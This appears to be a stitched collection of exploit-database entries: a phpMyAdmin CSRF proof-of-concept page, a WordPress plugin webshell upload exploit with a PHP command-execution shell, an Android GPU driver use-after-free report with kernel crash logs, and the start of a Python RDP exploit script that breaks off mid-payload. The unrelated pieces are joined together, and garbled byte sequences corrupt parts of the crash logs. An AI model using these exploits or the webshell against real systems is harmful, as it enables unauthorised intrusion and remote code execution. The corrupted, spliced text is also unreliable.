pmaUser-1=%7B%22iv%22%3A%22M16ZzlA0rqF9BZ1jFsssjQ%3D%3D%22%2C%22mac%22%3A%22804941d12fceca0997e181cbcb8427d68c668240%22%2C%22payload%22%3A%22mD9juTxAYhC7lA7XPWHWOw%3D%3D%22%7D; phpMyAdmin=9bdd66557e399fc1447bf253bc2dc133 Upgrade-Insecure-Requests: 1 Host: localhost:9000 The attacker can easily create a fake hyperlink containing the request that wants to execute on behalf the user,in this way making possible a CSRF attack due to the wrong use of HTTP method #POC <!doctype html> <html lang="en"> <head> <meta charset="utf-8"> <title>POC CVE-2019-12616</title> </head> <body> <a href="http://localhost:9000/tbl_sql.php?sql_query=INSERT+INTO+`pma__bookmark`+(`id`%2C+`dbase`%2C+`user`%2C+`label`%2C+`query`)+VALUES+(DAYOFWEEK('')%2C+''%2C+''%2C+''%2C+'')&show_query=1&db=phpmyadmin&table=pma__bookmark">View my Pictures!</a> </body> </html>

# Exploit Title: Authenticated code execution in `insert-or-embed-articulate-content-into-wordpress` Wordpress plugin # Description: It is possible to upload and execute a PHP file using the plugin option to upload a zip archive # Date: june 2019 # Exploit Author: xulchibalraa # Vendor Homepage: https://wordpress.org/plugins/insert-or-embed-articulate-content-into-wordpress/ # Software Link: https://downloads.wordpress.org/plugin/insert-or-embed-articulate-content-into-wordpress.4.2995.zip # Version: 4.2995 <= 4.2997 # Tested on: Wordpress 5.1.1, PHP 5.6 # CVE : - ## 1. Create a .zip archive with 2 files: index.html, index.php echo "<html>hello</html>" > index.html echo "<?php echo system($_GET['cmd']); ?>" > index.php zip poc.zip index.html index.php ## 2. Log in to wp-admin with any user role that has access to the plugin functionality (by default even `Contributors` role have access to it) ## 3. Create a new Post -> Select `Add block` -> E-Learning -> Upload the poc.zip -> Insert as: Iframe -> Insert (just like in tutorial https://youtu.be/knst26fEGCw?t=44 ;) ## 4. Access the webshell from the URL displayed after upload similar to http://website.com/wp-admin/uploads/articulate_uploads/poc/index.php?cmd=whoami

The following issue exists in the android-msm-wahoo-4.4-pie branch of https://android.googlesource.com/kernel/msm (and possibly others): When kgsl_mem_entry_destroy() in drivers/gpu/msm/kgsl.c is called for a writable entry with memtype KGSL_MEM_ENTRY_USER, it attempts to mark the entry's pages as dirty using the function set_page_dirty(). This function first loads page->mapping using page_mapping(), then calls the function pointer mapping->a_ops->set_page_dirty. The bug is that, as explained in upstream commit e92bb4dd9673 ( https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=e92bb4dd9673945179b1fc738c9817dd91bfb629), the mapping of a page can be freed concurrently unless it is protected somehow (e.g. by holding the page lock, or by holding a reference to the mapping). For callers who don't hold any such lock or reference, set_page_dirty_lock() is provided to safely mark a page as dirty: ================================== /* * set_page_dirty() is racy if the caller has no reference against * page->mapping->host, and if the page is unlocked. This is because another * CPU could truncate the page off the mapping and then free the mapping. * * Usually, the page _is_ locked, or the caller is a user-space process which * holds a reference on the inode by having an open file. * * In other cases, the page should be locked before running set_page_dirty(). */ int set_page_dirty_lock(struct page *page) { int ret; lock_page(page); ret = set_page_dirty(page); unlock_page(page); return ret; } ================================== To reproduce on a Pixel 2 (walleye): - Check out the tree specified above. - Enable KASAN in the kernel config. - Apply the attached kernel patch kgsl-bigger-race-window.patch to make the race window much bigger. - Build and boot the kernel. - Build the attached poc.c with `aarch64-linux-gnu-gcc -static -o poc poc.c -Wall`. - Run the PoC on the device (adb push, then run from adb shell). You should see a kernel crash like this; note KASAN's report of a UAF in set_page_dirty(): ================================== <6>[ 445.698708] c3 688 mdss_fb_blank_sub: mdss_fb_blank+0x1d0/0x2b4 mode:0 <3>[ 447.372706] c3 2621 ================================================================== <3>[ 447.372963] c3 2621 BUG: KASAN: use-after-free in set_page_dirty+0x4c/0xd0 <3>[ 447.380051] c3 2621 Read of size 8 at addr 0000000000000000 by task kworker/3:3/2621 <3>[ 447.387059] c3 2621 <4>[ 447.394762] c3 2621 CPU: 3 PID: 2621 Comm: kworker/3:3 Not tainted 4.4.116-gbcd0ecccd040-dirty #45 <4>[ 447.397158] c3 2621 Hardware name: Qualcomm Technologies, Inc. MSM8998 v2.1 (DT) <4>[ 447.406473] c3 2621 Workqueue: kgsl-mementry _deferred_put <4>[ 447.418479] c3 2621 Call trace: <4>[ 447.418660] c3 2621 [<ffffffa689e8dfbc>] dump_backtrace+0x0/0x2b4 <4>[ 447.421952] c3 2621 [<ffffffa689e8e394>] show_stack+0x14/0x1c <4>[ 447.428066] c3 2621 [<ffffffa68a2f3d2c>] dump_stack+0xa4/0xcc <4>[ 447.433965] c3 2621 [<ffffffa68a07b254>] print_address_description+0x94/0x340 <4>[ 447.439870] c3 2621 [<ffffffa68a07b784>] kasan_report+0x1f8/0x340 <4>[ 447.447145] c3 2621 [<ffffffa68a079a10>] __asan_load8+0x74/0x90 <4>[ 447.453407] c3 2621 [<ffffffa68a0205b4>] set_page_dirty+0x4c/0xd0 <4>[ 447.459621] c3 2621 [<ffffffa68a6c5dec>] kgsl_mem_entry_destroy+0x1c0/0x218 <4>[ 447.465695] c3 2621 [<ffffffa68a6c63d8>] _deferred_put+0x34/0x3c <4>[ 447.473017] c3 2621 [<ffffffa689edc124>] process_one_work+0x254/0x78c <4>[ 447.479093] c3 2621 [<ffffffa689edc6f4>] worker_thread+0x98/0x718 <4>[ 447.485551] c3 2621 [<ffffffa689ee59a4>] kthread+0x114/0x130 <4>[ 447.491801] c3 2621 [<ffffffa689e84250>] ret_from_fork+0x10/0x40 <3>[ 447.497696] c3 2621 <3>[ 447.503818] c3 2621 Allocated by task 2684: <4>[ 447.506206] c3 2621 [<ffffffa689e8d624>] save_stack_trace_tsk+0x0/0x1b8 <4>[ 447.511847] c3 2621 [<ffffffa689e8d7f4>] save_stack_trace+0x18/0x20 <4>[ 447.517829] c3 2621 [<ffffffa68a079e74>] kasan_kmalloc.part.5+0x50/0x124 <4>[ 447.523494] c3 2621 [<ffffffa68a07a198>] kasan_kmalloc+0xc4/0xe4 <4>[ 447.529547] c3 2621 [<ffffffa68a07a964>] kasan_slab_alloc+0x14/0x1c <4>[ 447.534931] c3 2621 [<ffffffa68a078030>] kmem_cache_alloc+0x144/0x27c <4>[ 447.540572] c3 2621 [<ffffffa68a187bdc>] ext4_alloc_inode+0x28/0x234 <4>[ 447.546387] c3 2621 [<ffffffa68a0afe94>] alloc_inode+0x34/0xd0 <4>[ 447.552112] c3 2621 [<ffffffa68a0b19e8>] new_inode+0x20/0xe8 <4>[ 447.557318] c3 2621 [<ffffffa68a154214>] __ext4_new_inode+0xe8/0x1f00 <4>[ 447.562360] c3 2621 [<ffffffa68a17087c>] ext4_tmpfile+0xb4/0x230 <4>[ 447.568172] c3 2621 [<ffffffa68a09f9e8>] path_openat+0x934/0x1404 <4>[ 447.573556] c3 2621 [<ffffffa68a0a1a50>] do_filp_open+0x98/0x188 <4>[ 447.579027] c3 2621 [<ffffffa68a089004>] do_sys_open+0x170/0x2d4 <4>[ 447.584407] c3 2621 [<ffffffa68a0891a0>] SyS_openat+0x10/0x18 <4>[ 447.589787] c3 2621 [<ffffffa689e842b0BCho<D5> ^@^@<90>^A,^A^Hp<D6>M>] el0_svc_naked+0x24/0x28 <3>[ 447.594909] c3 2621 <3>[ 447.599065] c3 2621 Freed by task 36: <4>[ 447.601330] c3 2621 [<ffffffa689e8d624>] save_stack_trace_tsk+0x0/0x1b8 <4>[ 447.606461] c3 2621 [<ffffffa689e8d7f4>] save_stack_trace+0x18/0x20 <4>[ 447.612450] c3 2621 [<ffffffa68a07aa1c>] kasan_slab_free+0xb0/0x1c0 <4>[ 447.618091] c3 2621 [<ffffffa68a0770c0>] kmem_cache_free+0x80/0x2f8 <4>[ 447.623733] c3 2621 [<ffffffa68a1863f8>] ext4_i_callback+0x18/0x20 <4>[ 447.629363] c3 2621 [<ffffffa689f5c430>] rcu_nocb_kthread+0x20c/0x264 <4>[ 447.634926] c3 2621 [<ffffffa689ee59a4>] kthread+0x114/0x130 <4>[ 447.640726] c3 2621 [<ffffffa689e84250>] ret_from_fork+0x10/0x40 <3>[ 447.645765] c3 2621 <3>[ 447.649913] c3 2621 The buggy address belongs to the object at 0000000000000000 <3>[ 447.649913] c3 2621 which belongs to the cache ext4_inode_cache of size 1048 <3>[ 447.652315] c3 2621 The buggy address is located 680 bytes inside of <3>[ 447.652315] c3 2621 1048-byte region [0000000000000000, 0000000000000000) <3>[ 447.667170] c3 2621 The buggy address belongs to the page: <1>[ 447.680933] c3 2621 Unable to handle kernel paging request at virtual address ffffffd8929b3000 <1>[ 447.686392] c3 2621 pgd = 0000000000000000 <1>[ 447.695099] c3 2621 [ffffffd8929b3000] *pgd=0000000000000000, *pud=0000000000000000 <4>[ 447.706506] c3 2621 ------------[ cut here ]------------ <2>[ 447.706664] c3 2621 Kernel BUG at 0000000000000000 [verbose debug info unavailable] <0>[ 447.711676] c3 2621 Internal error: Oops - BUG: 96000047 [#1] PREEMPT SMP <4>[ 447.719517] c3 2621 Modules linked in: <4>[ 447.729365] c3 2621 CPU: 3 PID: 2621 Comm: kworker/3:3 Not tainted 4.4.116-gbcd0ecccd040-dirty #45 <4>[ 447.729573] c3 2621 Hardware name: Qualcomm Technologies, Inc. MSM8998 v2.1 (DT) <4>[ 447.738760] c3 2621 Workqueue: kgsl-mementry _deferred_put <4>[ 447.750779] c3 2621 task: 0000000000000000 task.stack: 0000000000000000 <4>[ 447.750972] c3 2621 PC is at el1_sync+0x28/0xe0 <4>[ 447.757719] c3 2621 LR is at dump_page+0x10/0x18 <4>[ 447.762390] c3 2621 pc : [<ffffffa689e836e8>] lr : [<ffffffa68a04d9dc>] pstate: 204003c5 <4>[ 447.767106] c3 2621 sp : ffffffd8929b2f60 <4>[ 447.775306] c3 2621 x29: ffffffd8929b4000 x28: ffffffd88e9a47d0 <4>[ 447.784631] c3 2621 x27: ffffffd8294fab80 x26: ffffffa68ba1f000 <4>[ 447.789927] c3 2621 x25: ffffffd8536fc908 x24: ffffffd8536fc4e8 <4>[ 447.795219] c3 2621 x23: ffffffd892e55500 x22: 0000000000000001 <4>[ 447.800513] c3 2621 x21: ffffffa68ba1aa00 x20: 0000000000000000 <4>[ 447.805809] c3 2621 x19: ffffffbe214dbe00 x18: 0000007f7dc4ef8a <4>[ 447.811105] c3 2621 x17: 0000007f809eb0e0 x16: ffffffa68a0a5178 <4>[ 447.816400] c3 2621 x15: 0000000000000021 x14: 202c303030303030 <4>[ 447.821694] c3 2621 x13: 3030303030303030 x12: e95cc056ac940c73 <4>[ 447.826992] c3 2621 x11: ffffffd8929fb810 x10: ffffff8b12978008 <4>[ 447.832286] c3 2621 x9 : ffffff8b12978007 x8 : ffffffa68a21a558 <4>[ 447.837590] c3 2621 x7 : ffffffa68c69ec28 x6 : 0000000000000040 <4>[ 447.842872] c3 2621 x5 : 0000000000000000 x4 : ffffff87c429b7c0 <4>[ 447.848170] c3 2621 x3 : ffffffa68a04d8dc x2 : 0000000000000000 <4>[ 447.853468] c3 2621 x1 : ffffffa68ba1aa00 x0 : ffffffbe214dbe00 <4>[ 447.858765] c3 2621 <4>[ 447.858765] c3 2621 PC: 0xffffffa689e836a8: <4>[ 447.859009] c3 2621 36a8 d503201f d503201f d503201f d503201f d503201f d503201f a90007e0 a9010fe2 <4>[ 447.873684] c3 2621 36c8 a90217e4 a9031fe6 a90427e8 a9052fea a90637ec a9073fee a90847f0 a9094ff2 <4>[ 447.881847] c3 2621 36e8 a90a57f4 a90b5ff6 a90c67f8 a90d6ffa a90e77fc 9104c3f5 d538411c f9400794 <4>[ 447.890005] c3 2621 3708 f90093f4 d2c01014 f9000794 d5384036 d5384017 a90f57fe d503201f d5382015 <4>[ 447.898172] c3 2621 <4>[ 447.898172] c3 2621 LR: 0xffffffa68a04d99c: <4>[ 447.898371] c3 2621 d99c b000ce80 9113e000 97feface aa1303e0 9400affc f9400260 9117e2e1 528002a2 <4>[ 447.91300BCho<D6> ^@^@<90>^A+^A<98>3<8E><DA>8] c3 2621 d9bc 9106c021 8a000280 97ffff2c 17ffffe6 a9bf7bfd d2800002 910003fd 97ffffb4 <4>[ 447.921170] c3 2621 d9dc a8c17bfd d65f03c0 a9ac7bfd 910003fd a90153f3 a9025bf5 a90363f7 a9046bf9 <4>[ 447.929328] c3 2621 d9fc a90573fb d10443ff aa0003f3 9400afe5 aa1303e0 f8410402 f90033a2 9400af97 <4>[ 447.937494] c3 2621 <4>[ 447.937494] c3 2621 SP: 0xffffffd8929b2f20: <4>[ 447.937693] c3 2621 2f20 8a04d9dc ffffffa6 929b2f60 ffffffd8 89e836e8 ffffffa6 204003c5 00000000 <4>[ 447.952331] c3 2621 2f40 00000000 00000000 00000000 00000000 ffffffff ffffffff 00000000 00000000 <4>[ 447.960491] c3 2621 2f60 214dbe00 ffffffbe 8ba1aa00 ffffffa6 00000000 00000000 8a04d8dc ffffffa6 <4>[ 447.968651] c3 2621 2f80 c429b7c0 ffffff87 00000000 00000000 00000040 00000000 8c69ec28 ffffffa6 <4>[ 447.976809] c3 2621 <0>[ 447.976941] c3 2621 Process kworker/3:3 (pid: 2621, stack limit = 0x0000000000000000) <4>[ 447.979247] c3 2621 Call trace: <4>[ 447.987122] c3 2621 Exception stack(0xffffffd8929b2d60 to 0xffffffd8929b2e90) <4>[ 447.990662] c3 2621 2d60: ffffffbe214dbe00 0000008000000000 00000000836e2000 ffffffa689e836e8 <4>[ 447.997788] c3 2621 2d80: 00000000204003c5 0000000000000025 ffffffd8536fc908 0000000000000000 <4>[ 448.006468] c3 2621 2da0: 0000000000000000 0000000000000000 0000000000000000 0000000000000000 <4>[ 448.015098] c3 2621 2dc0: 0000000000000000 0000000000000000 0000000000000000 0000000000000000 <4>[ 448.023777] c3 2621 2de0: 0000000000000000 0000000000000000 0000000000000000 0000000000000000 <4>[ 448.032461] c3 2621 2e00: 0000000000000000 0000000000000000 0000000000000000 0000000000000000 <4>[ 448.041195] c3 2621 2e20: 0000000000000000 e95cc056ac940c73 ffffffbe214dbe00 ffffffa68ba1aa00 <4>[ 448.049872] c3 2621 2e40: 0000000000000000 ffffffa68a04d8dc ffffff87c429b7c0 0000000000000000 <4>[ 448.058561] c3 2621 2e60: 0000000000000040 ffffffa68c69ec28 ffffffa68a21a558 ffffff8b12978007 <4>[ 448.067216] c3 2621 2e80: ffffff8b12978008 ffffffd8929fb810 <4>[ 448.075867] c3 2621 [<ffffffa689e836e8>] el1_sync+0x28/0xe0 <0>[ 448.081787] c3 2621 Code: a90637ec a9073fee a90847f0 a9094ff2 (a90a57f4) <4>[ 448.087496] c3 2621 ---[ end trace 8d4b2347f8b71fe7 ]--- <4>[ 448.087540] c4 2684 ------------[ cut here ]------------ <2>[ 448.087544] c4 2684 Kernel BUG at 0000000000000000 [verbose debug info unavailable] <0>[ 448.087547] c4 2684 Internal error: Oops - BUG: 96000005 [#2] PREEMPT SMP <4>[ 448.087553] c4 2684 Modules linked in: <4>[ 448.087561] c4 2684 CPU: 4 PID: 2684 Comm: poc Tainted: G D 4.4.116-gbcd0ecccd040-dirty #45 <4>[ 448.087563] c4 2684 Hardware name: Qualcomm Technologies, Inc. MSM8998 v2.1 (DT) <4>[ 448.087565] c4 2684 task: 0000000000000000 task.stack: 0000000000000000 <4>[ 448.087578] c4 2684 PC is at qlist_free_all+0x3c/0x80 <4>[ 448.087581] c4 2684 LR is at qlist_free_all+0x7c/0x80 <4>[ 448.087585] c4 2684 pc : [<ffffffa68a07bbbc>] lr : [<ffffffa68a07bbfc>] pstate: 60400145 <4>[ 448.087586] c4 2684 sp : ffffffd87e3b3880 <4>[ 448.087591] c4 2684 x29: ffffffd87e3b3880 x28: ffffffa68ca1a000 <4>[ 448.087595] c4 2684 x27: 000000000591e848 x26: ffffffd87e3b3920 <4>[ 448.087598] c4 2684 x25: 0000000000000140 x24: 0000000000000000 <4>[ 448.087601] c4 2684 x23: ffffffd87e3b3920 x22: ffffffa68a07bbbc <4>[ 448.087604] c4 2684 x21: 0000000000000000 x20: ffffffd8929f8040 <4>[ 448.087607] c4 2684 x19: ffffffd8929f8040 x18: 00000000c8056d20 <4>[ 448.087611] c4 2684 x17: 000000002c754130 x16: 0000000085837409 <4>[ 448.087613] c4 2684 x15: 00000000a50d5ad3 x14: 0000000000000000 <4>[ 448.087617] c4 2684 x13: 0000000001075000 x12: ffffffffffffffff <4>[ 448.087620] c4 2684 x11: 0000000000000040 x10: ffffff8b0fc76746 <4>[ 448.087623] c4 2684 x9 : ffffff8b0fc76745 x8 : ffffffd87e3b3a2b <4>[ 448.087626] c4 2684 x7 : 0000000000000000 x6 : ffffffd87e3b3a08 <4>[ 448.087629] c4 2684 x5 : fffffffffe8c0000 x4 : 0000000000000000 <4>[ 448.087632] c4 2684 x3 : fBCho<D7> ^@^@<90>^A*^A<91><F9>%5fffffd8929f7ff0 x2 : 0000000000000000 <4>[ 448.087635] c4 2684 x1 : dead0000000000ff x0 : 0000000000000000 <4>[ 448.087637] c4 2684 <4>[ 448.087637] c4 2684 PC: 0xffffffa68a07bb7c: <4>[ 448.087646] c4 2684 bb7c 17fffff1 a9bc7bfd 910003fd a90153f3 a9025bf5 f9001bf7 f9400013 b4000253 <4>[ 448.087655] c4 2684 bb9c 90000016 aa0103f5 aa0003f7 912ef2d6 14000002 aa1403f3 aa1503e0 b40001f5 <4>[ 448.087664] c4 2684 bbbc b980c401 aa1603e2 f9400274 cb010261 97fff36f b5ffff14 f90006ff f90002ff <4>[ 448.087673] c4 2684 bbdc f9000aff a94153f3 a9425bf5 f9401bf7 a8c47bfd d65f03c0 aa1303e0 97ffff93 <4>[ 448.087675] c4 2684 <4>[ 448.087675] c4 2684 LR: 0xffffffa68a07bbbc: <4>[ 448.087684] c4 2684 bbbc b980c401 aa1603e2 f9400274 cb010261 97fff36f b5ffff14 f90006ff f90002ff <4>[ 448.087692] c4 2684 bbdc f9000aff a94153f3 a9425bf5 f9401bf7 a8c47bfd d65f03c0 aa1303e0 97ffff93 <4>[ 448.087701] c4 2684 bbfc 17fffff0 a9bc7bfd aa0003e2 910003fd a90153f3 f0012ed3 aa0003f4 b000eb40 <4>[ 448.087711] c4 2684 bc1c 910083a1 d538d083 913c8000 f90013bf 8b000060 f9452a63 f9001fa3 f90017bf <4>[ 448.087712] c4 2684 <4>[ 448.087712] c4 2684 SP: 0xffffffd87e3b3840: <4>[ 448.087722] c4 2684 3840 8a07bbfc ffffffa6 7e3b3880 ffffffd8 8a07bbbc ffffffa6 60400145 00000000 <4>[ 448.087731] c4 2684 3860 7e3b3920 ffffffd8 00000000 00000000 00000000 00000080 8b4ddfd0 ffffffa6 <4>[ 448.087740] c4 2684 3880 7e3b38c0 ffffffd8 8a07bf9c ffffffa6 8c656000 ffffffa6 8ca1f500 ffffffa6 <4>[ 448.087749] c4 2684 38a0 8ca1a000 ffffffa6 000000f7 00000000 8c68d000 ffffffa6 fabb3a00 ffffffd7 <4>[ 448.087750] c4 2684 <0>[ 448.087753] c4 2684 Process poc (pid: 2684, stack limit = 0x0000000000000000) <4>[ 448.087754] c4 2684 Call trace: <4>[ 448.087758] c4 2684 Exception stack(0xffffffd87e3b3680 to 0xffffffd87e3b37b0) <4>[ 448.087763] c4 2684 3680: ffffffd8929f8040 0000008000000000 00000000836e2000 ffffffa68a07bbbc <4>[ 448.087768] c4 2684 36a0: 0000000060400145 0000000000000025 0000000000000140 ffffffd7fabb3a00 <4>[ 448.087773] c4 2684 36c0: 0000000000000000 ffffffd87e3b37d0 ffffffd87e3b3720 ffffffa68a0768e0 <4>[ 448.087779] c4 2684 36e0: ffffffbe224a7d80 0000000000000000 ffffffd7fabb3a00 ffffffd7fabb3a00 <4>[ 448.087784] c4 2684 3700: 0000000100150015 ffffffd8929f7e00 0000000180150014 ffffffd899803b00 <4>[ 448.087789] c4 2684 3720: ffffffd87e3b3830 ffffffa68a078b38 ffffffbe224a7d80 ffffffd8929f7ff0 <4>[ 448.087794] c4 2684 3740: ffffffd7fabb3a00 e95cc056ac940c73 0000000000000000 dead0000000000ff <4>[ 448.087799] c4 2684 3760: 0000000000000000 ffffffd8929f7ff0 0000000000000000 fffffffffe8c0000 <4>[ 448.087804] c4 2684 3780: ffffffd87e3b3a08 0000000000000000 ffffffd87e3b3a2b ffffff8b0fc76745 <4>[ 448.087808] c4 2684 37a0: ffffff8b0fc76746 0000000000000040 <4>[ 448.087813] c4 2684 [<ffffffa68a07bbbc>] qlist_free_all+0x3c/0x80 <4>[ 448.087819] c4 2684 [<ffffffa68a07bf9c>] quarantine_reduce+0x17c/0x1a0 <4>[ 448.087824] c4 2684 [<ffffffa68a07a1b4>] kasan_kmalloc+0xe0/0xe4 <4>[ 448.087828] c4 2684 [<ffffffa68a07a964>] kasan_slab_alloc+0x14/0x1c <4>[ 448.087832] c4 2684 [<ffffffa68a078030>] kmem_cache_alloc+0x144/0x27c <4>[ 448.087840] c4 2684 [<ffffffa68a15d0dc>] ext4_inode_attach_jinode+0x9c/0x118 <4>[ 448.087844] c4 2684 [<ffffffa68a150d74>] ext4_file_open+0xc8/0x21c <4>[ 448.087848] c4 2684 [<ffffffa68a087488>] do_dentry_open+0x350/0x4ec <4>[ 448.087851] c4 2684 [<ffffffa68a087930>] finish_open+0x74/0xa8 <4>[ 448.087857] c4 2684 [<ffffffa68a09fa34>] path_openat+0x980/0x1404 <4>[ 448.087861] c4 2684 [<ffffffa68a0a1a50>] do_filp_open+0x98/0x188 <4>[ 448.087866] c4 2684 [<ffffffa68a089004>] do_sys_open+0x170/0x2d4 <4>[ 448.087869] c4 2684 [<ffffffa68a0891a0>] SyS_openat+0x10/0x18 <4>[ 448.087875] c4 2684 [<ffffffa689e842b0>] el0_svc_naked+0x24/0x28 <0>[ 448.087881] c4 2684 Code: 14000002 aa1403f3 aa1503e0 b40001f5 (b980c401) <4>[ 448.087944] c4 2684 ---[ end trace 8d4DBGC ================================== The KASAN report points to instruction 267c in the following assembly: ================================== 0000000000002630 <set_page_dirty>: { 2630: a9bd7bfd stp x29, x30, [sp, #-48]! 2634: 910003fd mov x29, sp 2638: a90153f3 stp x19, x20, [sp, #16] 263c: f90013f5 str x21, [sp, #32] 2640: aa0003f3 mov x19, x0 struct address_space *mapping = page_mapping(page); 2644: 94000000 bl 0 <page_mapping> 2648: aa0003f4 mov x20, x0 264c: d5384115 mrs x21, sp_el0 if (current->jh_task_flags && mapping) 2650: 9128a2a0 add x0, x21, #0xa28 2654: 94000000 bl 0 <__asan_load4> 2658: b94a2aa0 ldr w0, [x21, #2600] 265c: 340000a0 cbz w0, 2670 <set_page_dirty+0x40> 2660: b40003b4 cbz x20, 26d4 <set_page_dirty+0xa4> msleep(500); 2664: 52803e80 mov w0, #0x1f4 // #500 2668: 94000000 bl 0 <msleep> 266c: 14000002 b 2674 <set_page_dirty+0x44> if (likely(mapping)) { 2670: b4000334 cbz x20, 26d4 <set_page_dirty+0xa4> int (*spd)(struct page *) = mapping->a_ops->set_page_dirty; 2674: 9101a280 add x0, x20, #0x68 2678: 94000000 bl 0 <__asan_load8> 267c: f9403694 ldr x20, [x20, #104] 2680: 91006280 add x0, x20, #0x18 2684: 94000000 bl 0 <__asan_load8> 2688: f9400e94 ldr x20, [x20, #24] 268c: aa1303e0 mov x0, x19 2690: 94000000 bl 0 <__asan_load8> 2694: f9400260 ldr x0, [x19] ================================== Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46941.zip

import socket, sys, struct from OpenSSL import SSL from impacket.structure import Structure # I'm not responsible for what you use this to accomplish and should only be used for education purposes # Could clean these up since I don't even use them class TPKT(Structure): commonHdr = ( ('Version','B=3'), ('Reserved','B=0'), ('Length','>H=len(TPDU)+4'), ('_TPDU','_-TPDU','self["Length"]-4'), ('TPDU',':=""'), ) class TPDU(Structure): commonHdr = ( ('LengthIndicator','B=len(VariablePart)+1'), ('Code','B=0'), ('VariablePart',':=""'), ) def __init__(self, data = None): Structure.__init__(self,data) self['VariablePart']='' class CR_TPDU(Structure): commonHdr = ( ('DST-REF','<H=0'), ('SRC-REF','<H=0'), ('CLASS-OPTION','B=0'), ('Type','B=0'), ('Flags','B=0'), ('Length','<H=8'), ) class DATA_TPDU(Structure): commonHdr = ( ('EOT','B=0x80'), ('UserData',':=""'), ) def __init__(self, data = None): Structure.__init__(self,data) self['UserData'] ='' class RDP_NEG_REQ(CR_TPDU): structure = ( ('requestedProtocols','<L'), ) def __init__(self,data=None): CR_TPDU.__init__(self,data) if data is None: self['Type'] = 1 def send_init_packets(host): tpkt = TPKT() tpdu = TPDU() rdp_neg = RDP_NEG_REQ() rdp_neg['Type'] = 1 rdp_neg['requestedProtocols'] = 1 tpdu['VariablePart'] = rdp_neg.getData() tpdu['Code'] = 0xe0 tpkt['TPDU'] = tpdu.getData() s = socket.socket() s.connect((host, 3389)) s.sendall(tpkt.getData()) s.recv(8192) ctx = SSL.Context(SSL.TLSv1_METHOD) tls = SSL.Connection(ctx,s) tls.set_connect_state() tls.do_handshake() return tls # This can be fixed length now buttfuckit def send_client_data(tls): p = "\x03\x00\x01\xca\x02\xf0\x80\x7f\x65\x82\x07\xc2\x04\x01\x01\x04\x01\x01\x01\x01\xff\x30\x19\x02\x01\x22\x02\x01\x02\x02\x01\x00\x02\x01\x01\x02\x01\x00\x02\x01\x01\x02\x02\xff\xff\x02\x01\x02\x30\x19\x02\x01\x01\x02\x01\x01\x02\x01\x01\x02\x01\x01\x02\x01\x00\x02\x01\x01\x02\x02\x04\x20\x02\x01\x02\x30\x1c\x02\x02\xff\xff\x02\x02\xfc\x17\x02\x02\xff\xff\x02\x01\x01\x02\x01\x00\x02\x01\x01\x02\x02\xff\xff\x02\x01\x02\x04\x82\x01\x61\x00\x05\x00\x14\x7c\x00\x01\x81\x48\x00\x08\x00\x10\x00\x01\xc0\x00\x44\x75\x63\x61\x81\x34\x01\xc0\xea\x00\x0a\x00\x08\x00\x80\x07\x38\x04\x01\xca\x03\xaa\x09\x04\x00\x00\xee\x42\x00\x00\x44\x00\x45\x00\x53\x00\x4b\x00\x54\x00\x4f\x00\x50\x00\x2d\x00\x46\x00\x38\x00\x34\x00\x30\x00\x47\x00\x49\x00\x4b\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xca\x01\x00\x00\x00\x00\x00\x18\x00\x0f\x00\xaf\x07\x62\x00\x63\x00\x37\x00\x38\x00\x65\x00\x66\x00\x36\x00\x33\x00\x2d\x00\x39\x00\x64\x00\x33\x00\x33\x00\x2d\x00\x34\x00\x31\x00\x39\x38\x00\x38\x00\x2d\x00\x39\x00\x32\x00\x63\x00\x66\x00\x2d\x00\x00\x31\x00\x62\x00\x32\x00\x64\x00\x61\x00\x42\x42\x42\x42\x07\x00\x01\x00\x00\x00\x56\x02\x00\x00\x50\x01\x00\x00\x00\x00\x64\x00\x00\x00\x64\x00\x00\x00\x04\xc0\x0c\x00\x15\x00\x00\x00\x00\x00\x00\x00\x02\xc0\x0c\x00\x1b\x00\x00\x00\x00\x00\x00\x00\x03\xc0\x38\x00\x04\x00\x00\x00\x72\x64\x70\x73\x6e\x64\x00\x00\x0f\x00\x00\xc0\x63\x6c\x69\x70\x72\x64\x72\x00\x00\x00\xa0\xc0\x64\x72\x64\x79\x6e\x76\x63\x00\x00\x00\x80\xc0\x4d\x53\x5f\x54\x31\x32\x30\x00\x00\x00\x00\x00" size0 = struct.pack(">h", len(p)) size1 = struct.pack(">h", len(p)-12) size2 = struct.pack(">h", len(p)-109) size3 = struct.pack(">h", len(p)-118) size4 = struct.pack(">h", len(p)-132) size5 = struct.pack(">h", len(p)-390) ba = bytearray() ba.extend(map(ord, p)) ba[2] = size0[0] ba[3] = size0[1] ba[10] = size1[0] ba[11] = size1[1] ba[107] = size2[0] ba[108] = size2[1] ba[116] = 0x81 ba[117] = size3[1] ba[130] = 0x81 ba[131] = size4[1] ba[392] = size5[1] tls.sendall(bytes(ba)) tls.recv(8192) def send_client_info(tls): p = b"\x03\x00\x01\x61\x02\xf0\x80\x64\x00\x07\x03\xeb\x70\x81\x52\x40\x00\xa1\xa5\x09\x04\x09\x04\xbb\x47\x03\x00\x00\x00\x0e\x00\x08\x00\x00\x00\x00\x00\x00\x00\x41\x00\x41\x00\x41\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00\x74\x00\x65\x00\x73\x00\x74\x00\x00\x00\x00\x00\x00\x00\x02\x00\x1c\x00\x31\x00\x39\x00\x32\x00\x2e\x00\x41\x41\x41\x00\x38\x00\x2e\x00\x32\x00\x33\x00\x32\x00\x2e\x00\x31\x00\x00\x00\x40\x00\x43\x00\x3a\x00\x5c\x00\x57\x00\x49\x00\x4e\x00\x41\x41\x41\x00\x57\x00\x53\x00\x5c\x00\x73\x00\x79\x00\x73\x00\x74\x00\x65\x00\x6d\x00\x33\x00\x32\x00\x5c\x00\x6d\x00\x73\x00\x74\x00\x73\x00\x63\x00\x61\x00\x78\x00\x2e\x00\x64\x00\x6c\x00\x6c\x00\x00\x00\xa4\x01\x00\x00\x4d\x00\x6f\x00\x75\x00\x6e\x00\x74\x00\x61\x00\x69\x00\x6e\x00\x20\x00\x53\x00\x74\x00\x61\x00\x6e\x00\x64\x00\x61\x00\x72\x00\x64\x00\x20\x00\x54\x00\x69\x00\x6d\x00\x65\x00\x00\